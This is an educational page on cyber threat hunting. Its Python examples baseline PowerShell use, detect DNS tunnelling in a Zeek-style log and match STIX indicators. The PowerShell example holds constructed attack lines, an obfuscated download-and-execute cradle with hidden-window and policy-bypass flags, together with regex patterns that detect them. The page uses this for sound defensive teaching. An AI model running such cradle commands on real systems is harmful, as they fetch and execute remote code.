05 CYBER SECURITY ANALYTICS TOOLS - THREAT HUNTING
What is Cyber Threat Hunting?: Cyber threat hunting is a proactive search through networks, endpoints, and datasets for malicious, suspicious, or risky activity that has evaded the existing detection tools. That is the distinction between threat detection and threat hunting: detection is a largely passive matter of monitoring data and systems for potential security issues, but it remains a necessity and feeds the hunter. Proactive hunting applies new threat intelligence to previously collected data to identify and categorize potential threats before an attack unfolds.
Security personnel cannot afford to assume their defenses are impenetrable; they must stay vigilant for the next threat or vulnerability. Rather than waiting for threats to strike, threat hunting forms hypotheses from the known behaviors of threat actors and validates them through active searches of the environment. A hunter does not start from an alert or even from Indicators of Compromise (IOCs) but from deeper reasoning and forensic analysis; in many cases the hunter's work is what creates and substantiates the alert or IOC. Threat hunting assumes that a breach has occurred or will occur, and it puts the emphasis on hunting down threats already in the environment rather than on deploying the latest tool.
Threat hunting investigations¶
Traditional threat hunting is a manual process in which a security analyst scrutinizes data, using their knowledge of the network and systems, to form hypotheses about potential threats. Threat hunting has become more effective and efficient with the addition of automation, machine learning, and user and entity behavior analytics (UEBA), which alert enterprise security teams to potential risks.
Once the risk (or potential risk) and the frequency of hunting have been determined, an investigation is initiated. Examples of threat hunting investigations include:
Hypothesis-driven investigation: When significant information about a new, imminent threat vector is discovered, the hunter delves into network or system logs in search of hidden anomalies or trends that could signal the new threat.
Analytics-driven investigation: Searches driven by information gathered from machine learning (ML) and artificial intelligence (AI) tools.
Tactics, techniques, and procedures (TTP) investigation: Hunting for the operational techniques that a given attacker habitually uses. This helps attribute the threat and reuse remediation methods that already worked against those behaviors.
Threat hunting is specific to each environment, but some techniques apply to almost any environment. Core threat hunting techniques include:
Baselining¶
Baselining helps the hunter understand what "normal" looks like within an organization. SANS describes the value of baselining as looking for a needle in a haystack: removing the hay in double-digit percentages shortens the time until the needle becomes visible. To combine baseline analysis with knowledge of attacker techniques without wasting effort, SANS suggests hunters consider the following questions:
How prevalent is PowerShell in your environment?¶
If it is prevalent, what does normal system administrator activity look like? Where does PowerShell activity typically originate, and which user accounts run it? With those answers, a hunter need not baseline all PowerShell use, but can instead look for unexpected outliers (a host and user that never ran it before) or attacker-specific command structures (encoded commands, hidden windows, execution-policy bypass, download cradles).
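As an added example (not from the page or from SANS), the following Python script baselines PowerShell launches per host and user from constructed process-creation records shaped like Windows Security event 4688, then hunts a later window for the two kinds of outliers described above: host/user pairs that never ran PowerShell during the baseline, and attacker-specific command structures (-EncodedCommand, hidden window, execution-policy bypass, download cradle). It also decodes any -EncodedCommand payload and re-checks it, because a cradle hidden behind base64 is invisible to pattern matching on the raw command line. The record field names, hosts, users and the encoded payload are all constructed for the example.

```python
"""Baseline PowerShell use per (host, user), then hunt for outliers.

Added example for this page, not SANS or the page author's code. The
records are constructed to resemble Windows Security event 4688 (process
creation) exported as dicts; the field names host/user/cmd are assumptions.
"""
import base64
import re
from collections import Counter

# Constructed payload and its PowerShell -EncodedCommand form (UTF-16LE, base64).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/x')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

# Baseline window: what "normal" PowerShell looks like (constructed sample).
BASELINE_EVENTS = [
    {"host": "WS-01", "user": "CORP\\admin.jane", "cmd": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"host": "WS-01", "user": "CORP\\admin.jane", "cmd": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"host": "SRV-02", "user": "CORP\\svc_backup", "cmd": "powershell.exe -NoProfile -File D:\\backup\\run.ps1"},
    {"host": "SRV-02", "user": "CORP\\svc_backup", "cmd": "powershell.exe -NoProfile -File D:\\backup\\run.ps1"},
    {"host": "WS-07", "user": "CORP\\bob", "cmd": "chrome.exe --type=renderer"},
]

# Hunt window (constructed): one routine launch, one encoded launch from a
# user who never ran PowerShell before, and one cradle from a known pair.
HUNT_EVENTS = [
    {"host": "WS-01", "user": "CORP\\admin.jane", "cmd": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"host": "WS-07", "user": "CORP\\bob", "cmd": "powershell.exe -nop -w hidden -enc " + ENC},
    {"host": "SRV-02", "user": "CORP\\svc_backup",
     "cmd": "powershell.exe -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')\""},
]

# Attacker-specific command structures. -NoProfile alone is deliberately not
# here: the baseline shows legitimate jobs use it, so it would only add noise.
SUSPICIOUS = {
    "encoded_command": re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}"),
    "hidden_window": re.compile(r"(?i)\s-w(?:indowstyle)?\s+hidden"),
    "exec_bypass": re.compile(r"(?i)\s-e(?:p|xecutionpolicy)\s+bypass"),
    "download_cradle": re.compile(r"(?i)\b(?:IEX|Invoke-Expression)\b.*(?:DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)"),
}


def is_powershell(cmd):
    """True when the launched image is powershell.exe or pwsh."""
    return re.match(r"(?i)\S*(?:powershell|pwsh)(?:\.exe)?\b", cmd) is not None


def decode_encoded_command(cmd):
    """Recover the script behind -EncodedCommand; None if absent or malformed."""
    m = re.search(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def build_baseline(events):
    """Count PowerShell launches per (host, user) in the baseline window."""
    return Counter((e["host"], e["user"]) for e in events if is_powershell(e["cmd"]))


def hunt(baseline, events):
    """Flag PowerShell launches that are new pairs or carry attacker structures."""
    findings = []
    for e in events:
        if not is_powershell(e["cmd"]):
            continue
        reasons = []
        if (e["host"], e["user"]) not in baseline:
            reasons.append("new_host_user_pair")
        reasons += [name for name, rx in SUSPICIOUS.items() if rx.search(e["cmd"])]
        decoded = decode_encoded_command(e["cmd"])
        if decoded is not None:
            # A cradle hidden behind -enc only shows up after decoding.
            reasons += [name for name, rx in SUSPICIOUS.items()
                        if name not in reasons and rx.search(decoded)]
        if reasons:
            finding = dict(e, reasons=reasons)
            if decoded is not None:
                finding["decoded"] = decoded
            findings.append(finding)
    return findings


def run_hunt():
    return hunt(build_baseline(BASELINE_EVENTS), HUNT_EVENTS)


if __name__ == "__main__":
    for f in run_hunt():
        print(f["host"], f["user"], f["reasons"])
        if "decoded" in f:
            print("  decoded:", f["decoded"])
```

The routine launch from the known administrator pair produces nothing, which is the point of the baseline: the hunter reads two findings instead of every PowerShell event. In a real hunt the baseline would be built from weeks of 4688 or Sysmon event 1 records, and the patterns would be reviewed against what the baseline shows administrators actually type.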
Attack-Specific Hunts¶
Baselining gives the hunter an understanding of the overall environment, but attack-specific hunts can track malicious activity faster. They typically focus on a specific threat actor or threat; the narrowness of the hunt model can, however, produce false positives. Attack-specific hunts combined with baselining often produce good results.
Time Sensitivity¶
All hunts are time sensitive, so hunters must revalidate their baseline terms periodically. SANS recommends confirming that new software deployments are not generating traffic that shows up as false positives. Attackers shift to new techniques, and sometimes revert to old ones, so intelligence-based hunts must be revalidated and repeated when legacy techniques reappear.
Third-Party Sources¶
Hunting for needles in a data haystack can overwhelm teams of hunters. Third-party providers can help guide hunters to more successful hunts. SANS lists the following benefits hunters can gather from third-party sources:
Ruling out false positive leads
Focusing on interesting leads
IP lookups
Geolocation
Encrypted traffic metadata
Log detection
Attacker technique overlays
Link analysis of internal vs. external or host vs. network data points
Five threat hunting steps¶
A cyber threat hunt is composed of steps or processes designed for an efficient, successful hunt. These steps include:
Step 1: Hypothesis Threat hunts begin with a hypothesis or a statement about the hunter’s ideas of what threats might be in the environment and how to go about finding them. A hypothesis can include a suspected attacker’s tactics, techniques, and procedures (TTPs). Threat hunters use threat intelligence, environmental knowledge, and their own experience and creativity to build a logical path to detection.
Step 2: Collect and Process Intelligence and Data Hunting for threats requires quality intelligence and data. A plan for collecting, centralizing, and processing data is required. Security Information and Event Management (SIEM) software can provide insight and a track record of activities in an enterprise’s IT environment.
Step 3: Trigger The hypothesis acts as a trigger, as does an advanced detection tool that points hunters to a particular system or area of the network where the investigation should begin.
Step 4: Investigation Investigative technology such as Endpoint Detection and Response (EDR) lets the hunter dig into potentially malicious anomalies on a system or network until each one is either determined to be benign or confirmed as malicious.
Step 5: Response/Resolution Data gathered from confirmed malicious activity can be fed into automated security technology to respond, resolve, and mitigate threats. Actions can include removing malware files, restoring altered or deleted files to their original state, updating firewall/IPS rules, deploying security patches, and changing system configurations, all the while building a better understanding of what occurred and how to improve defenses against similar attacks in future.
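The five steps as one runnable hunt, added here as an example rather than taken from the page: the hypothesis is DNS tunnelling or beaconing (many unique, long, high-entropy subdomains under one registered domain), the data is a constructed Zeek-style dns.log using a subset of its real columns, the trigger is an unusual count of unique subdomains per source and domain, the investigation scores entropy, label length and query rate to separate a busy but benign CDN client from a tunnel, and the response emits a resolver block indicator. Hosts, domains and thresholds are assumptions; the registered-domain split takes the last two labels and would need the public suffix list in production.

```python
"""The five hunt steps run end to end against Zeek-style dns.log records.

Added example for this page, not the page author's code. Hypothesis (step 1):
a host is tunnelling data or beaconing over DNS, which shows up as many
unique, long, high-entropy subdomains under one registered domain. The log
text is constructed and uses a subset of Zeek's dns.log columns.
"""
import hashlib
import math
from collections import Counter, defaultdict


def _line(ts, src, query, qtype):
    return f"{ts:.6f}\t{src}\t{query}\t{qtype}"


# Step 2 input (constructed): a benign host, a busy-but-benign CDN client,
# and a host pushing hex-encoded chunks to one domain as TXT queries.
_rows = ["#fields\tts\tid.orig_h\tquery\tqtype_name"]
for i in range(6):
    _rows.append(_line(1700000000 + i * 30, "10.0.0.5", ["www", "mail", "cdn"][i % 3] + ".example.com", "A"))
for i in range(10):
    _rows.append(_line(1700000000 + i * 20, "10.0.0.9", f"img{i}.example.org", "A"))
for i in range(12):
    chunk = hashlib.sha256(f"chunk-{i}".encode()).hexdigest()[:40]
    _rows.append(_line(1700000000 + i * 5, "10.0.0.23", f"{chunk}.c2.example.net", "TXT"))
DNS_LOG = "\n".join(_rows) + "\n"


def parse_dns_log(text):
    """Step 2: parse Zeek TSV output using its #fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def split_query(query):
    """Subdomain and registered domain. Assumes two-label registered domains;
    production code should consult the public suffix list."""
    labels = query.rstrip(".").lower().split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def entropy(s):
    """Shannon entropy in bits per character."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def trigger(rows, min_unique=8):
    """Step 3: (source, domain) pairs with an unusual number of unique subdomains."""
    groups = defaultdict(list)
    for r in rows:
        sub, base = split_query(r["query"])
        groups[(r["id.orig_h"], base)].append((float(r["ts"]), sub, r["qtype_name"]))
    return {k: v for k, v in groups.items() if len({s for _, s, _ in v}) >= min_unique}


def investigate(key, queries, entropy_floor=3.0, length_floor=30):
    """Step 4: characterise the triggered pair and decide benign vs malicious."""
    subs = [s for _, s, _ in queries]
    ts = sorted(t for t, _, _ in queries)
    stats = {
        "src": key[0], "domain": key[1],
        "unique_subdomains": len(set(subs)),
        "mean_entropy": sum(map(entropy, subs)) / len(subs),
        "mean_length": sum(map(len, subs)) / len(subs),
        "queries_per_min": 60 * len(queries) / max(ts[-1] - ts[0], 1.0),
        "qtypes": sorted({q for _, _, q in queries}),
        "first_seen": ts[0], "last_seen": ts[-1],
    }
    tunnel_like = stats["mean_entropy"] >= entropy_floor and stats["mean_length"] >= length_floor
    stats["verdict"] = "malicious" if tunnel_like else "benign"
    return stats


def respond(stats):
    """Step 5: turn a confirmed finding into an indicator for the resolver/SIEM."""
    return {"type": "domain-name", "value": stats["domain"], "action": "block-at-resolver",
            "source_host": stats["src"], "first_seen": stats["first_seen"],
            "last_seen": stats["last_seen"], "evidence": {k: stats[k] for k in
            ("unique_subdomains", "mean_entropy", "mean_length", "queries_per_min", "qtypes")}}


def run_hunt(log_text=DNS_LOG):
    rows = parse_dns_log(log_text)
    results = [investigate(k, v) for k, v in trigger(rows).items()]
    malicious = [s for s in results if s["verdict"] == "malicious"]
    return {"triggered": results, "malicious": malicious, "iocs": [respond(s) for s in malicious]}


if __name__ == "__main__":
    out = run_hunt()
    for s in out["triggered"]:
        print(f"{s['src']} -> {s['domain']}: {s['verdict']} (H={s['mean_entropy']:.2f}, len={s['mean_length']:.1f})")
    print(out["iocs"])
```

The CDN client trips the trigger (ten distinct img0 to img9 labels) but the investigation clears it on entropy and label length, which is why the trigger and the investigation are separate steps: a trigger is cheap and broad, the investigation is where the false positive is ruled out before anything reaches step 5.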
Threat Hunting using Notebook Technologies¶
Splunk: One of the most commonly used SIEM platforms, well known for data ingestion and analysis.
Elastic: Formerly known as the ELK stack, a suite comprising Elasticsearch, Logstash and Kibana for data collection and analysis, from which a SIEM environment can be built.
Security Onion: a free and open platform for threat hunting, network security monitoring, and log management. Security Onion includes best-of-breed free and open tools including Suricata, Zeek, Wazuh, the Elastic Stack and many others.
Kali Linux: A widely-used Linux distribution for security, built upon Debian, it comes pre-loaded with a wide range of security tools and software.
Python: Programming/scripting language for rapid code development. Used widely by security professionals and software developers alike.
Bash: GNU Bourne Again SHell. A sh-compatible command language interpreter that executes commands read from the standard input or from a file. Used as part of the Linux command line interface.
Wireshark: A widely-used packet capture (PCAP) tool for analysing network traffic. Alternatives include tcpdump, a command-line packet capture tool, and tshark, the command-line counterpart to Wireshark.
Scapy: A powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tshark, p0f, etc.). It also performs very well at a lot of other specific tasks that most other tools can't handle, like sending invalid frames, injecting your own 802.11 frames, and much more.
Security orchestration, automation and response (SOAR): Designed to integrate multiple components, often from different vendors. They allow organizations to streamline security operations in three key areas: threat and vulnerability management, incident response, and security operations automation.
What is Cyber threat intelligence?¶
Cyber threat intelligence is knowledge about threats and the vulnerabilities they exploit, gathered and analyzed so that defenders can act on it. Sources include open-source intelligence, social media intelligence, human intelligence, technical intelligence, and intelligence from the deep and dark web. Threat intelligence feeds and platforms are critical security tools that use global security data to help proactively identify, mitigate, and remediate security threats.
How do threat intelligence platforms work?¶
A Threat Intelligence Platform (TIP) works with SIEM and log management vendors behind the scenes, pulling down indicators and pushing them to the security solutions within the customer's network. The burden of establishing and maintaining these integrations is lifted from the analysts and shifted to the SIEM and TIP vendors.
It is useful to many teams within an organization, such as Security Operations Center (SOC) teams, threat intelligence teams, management, and executive teams. Possible security product integrations include API, SIEM, endpoint, IPS, and firewall.
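As an added example of what the TIP-to-SIEM handoff looks like in code (not any vendor's implementation), the following Python loads a constructed STIX 2.1-style indicator bundle, indexes single-comparison patterns by STIX object path and value, and matches normalized events against it, honoring each indicator's valid_from/valid_until window and counting the patterns it cannot evaluate so the analyst knows what the match did not cover. The bundle, the events, the event-field-to-STIX-path mapping and the confidence values are all constructed.

```python
"""Pull STIX 2.1-style indicators into a lookup and match them against events.

Added example for this page, not any vendor's TIP or SIEM code. The bundle,
the events and the event-field-to-STIX-path mapping are constructed; only
single-comparison patterns are handled, and anything else is counted as
unsupported so the hunter knows what the match did not cover.
"""
import hashlib
import json
import re
from datetime import datetime

SAMPLE_HASH = hashlib.sha256(b"constructed sample file").hexdigest()

# Constructed STIX 2.1-like bundle as a TIP might deliver it.
BUNDLE = json.dumps({"type": "bundle", "id": "bundle--0001", "objects": [
    {"type": "indicator", "id": "indicator--ip-1", "pattern_type": "stix", "confidence": 85,
     "pattern": "[ipv4-addr:value = '203.0.113.9']",
     "valid_from": "2024-01-01T00:00:00.000Z", "valid_until": "2025-01-01T00:00:00.000Z"},
    {"type": "indicator", "id": "indicator--dom-1", "pattern_type": "stix", "confidence": 70,
     "pattern": "[domain-name:value = 'c2.example.net']", "valid_from": "2024-01-01T00:00:00.000Z"},
    {"type": "indicator", "id": "indicator--hash-1", "pattern_type": "stix", "confidence": 95,
     "pattern": f"[file:hashes.'SHA-256' = '{SAMPLE_HASH}']", "valid_from": "2024-01-01T00:00:00.000Z"},
    {"type": "indicator", "id": "indicator--ip-old", "pattern_type": "stix", "confidence": 60,
     "pattern": "[ipv4-addr:value = '198.51.100.7']",
     "valid_from": "2023-01-01T00:00:00.000Z", "valid_until": "2023-06-01T00:00:00.000Z"},
    {"type": "indicator", "id": "indicator--multi", "pattern_type": "stix", "confidence": 50,
     "pattern": "[ipv4-addr:value = '192.0.2.1' OR ipv4-addr:value = '192.0.2.2']",
     "valid_from": "2024-01-01T00:00:00.000Z"},
    {"type": "identity", "id": "identity--vendor", "name": "example feed"},
]})

# Constructed events as a SIEM would normalise them; the field names and the
# mapping to STIX object paths are assumptions for this example.
EVENTS = [
    {"ts": "2024-05-01T10:00:00Z", "src_ip": "10.0.0.5", "dest_ip": "203.0.113.9"},
    {"ts": "2024-05-01T10:01:00Z", "src_ip": "10.0.0.5", "domain": "C2.EXAMPLE.NET"},
    {"ts": "2024-05-01T10:02:00Z", "src_ip": "10.0.0.8", "dest_ip": "198.51.100.7"},
    {"ts": "2024-05-01T10:03:00Z", "host": "WS-07", "sha256": SAMPLE_HASH.upper()},
    {"ts": "2024-05-01T10:04:00Z", "src_ip": "10.0.0.8", "dest_ip": "8.8.8.8"},
]
FIELD_TO_PATH = {"dest_ip": "ipv4-addr:value", "src_ip": "ipv4-addr:value",
                 "domain": "domain-name:value", "sha256": "file:hashes.'SHA-256'",
                 "url": "url:value"}

# One object path compared for equality with one literal; OR/AND/FOLLOWEDBY
# patterns need a real STIX pattern evaluator and are counted, not guessed.
_SIMPLE = re.compile(r"^\[([a-z0-9-]+:[^\s=]+)\s*=\s*'([^']+)'\]$")


def parse_ts(s):
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def load_indicators(bundle_json):
    """Index indicators by (STIX object path, normalised value)."""
    index, unsupported = {}, 0
    for obj in json.loads(bundle_json)["objects"]:
        if obj.get("type") != "indicator" or obj.get("pattern_type", "stix") != "stix":
            continue
        m = _SIMPLE.match(obj["pattern"])
        if not m:
            unsupported += 1
            continue
        path, value = m.group(1), m.group(2).lower()
        index[(path, value)] = {"id": obj["id"], "confidence": obj.get("confidence"),
                                "valid_from": parse_ts(obj["valid_from"]),
                                "valid_until": parse_ts(obj["valid_until"]) if "valid_until" in obj else None}
    return index, unsupported


def match_events(index, events):
    """Return one match per (event field, indicator) hit within the validity window."""
    matches = []
    for ev in events:
        ts = parse_ts(ev["ts"])
        for field, path in FIELD_TO_PATH.items():
            if field not in ev:
                continue
            ind = index.get((path, str(ev[field]).lower()))
            if ind is None:
                continue
            if ts < ind["valid_from"] or (ind["valid_until"] and ts >= ind["valid_until"]):
                continue  # expired or not-yet-valid indicators only create noise
            matches.append({"indicator": ind["id"], "confidence": ind["confidence"],
                            "field": field, "value": ev[field], "event": ev})
    return matches


def run_matching():
    index, unsupported = load_indicators(BUNDLE)
    return {"matches": match_events(index, EVENTS), "unsupported_patterns": unsupported,
            "indexed": len(index)}


if __name__ == "__main__":
    out = run_matching()
    for m in out["matches"]:
        print(m["indicator"], m["confidence"], m["field"], m["value"])
    print("unsupported patterns:", out["unsupported_patterns"])
```

Two details matter in practice and are the reason the example checks them: values are normalized (the upper-case hash and domain still match), and an indicator whose valid_until has passed does not fire, since stale IP indicators are the most common source of false positives in feed-driven matching.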
Here’s the Cyber Threat Intelligence Tools List:¶
Gartner's definition: threat intelligence is evidence-based knowledge, including context, mechanisms, indicators, implications, and actionable advice, about an existing or emerging menace or hazard to assets, which can be used to inform decisions regarding the subject's response to that menace or hazard.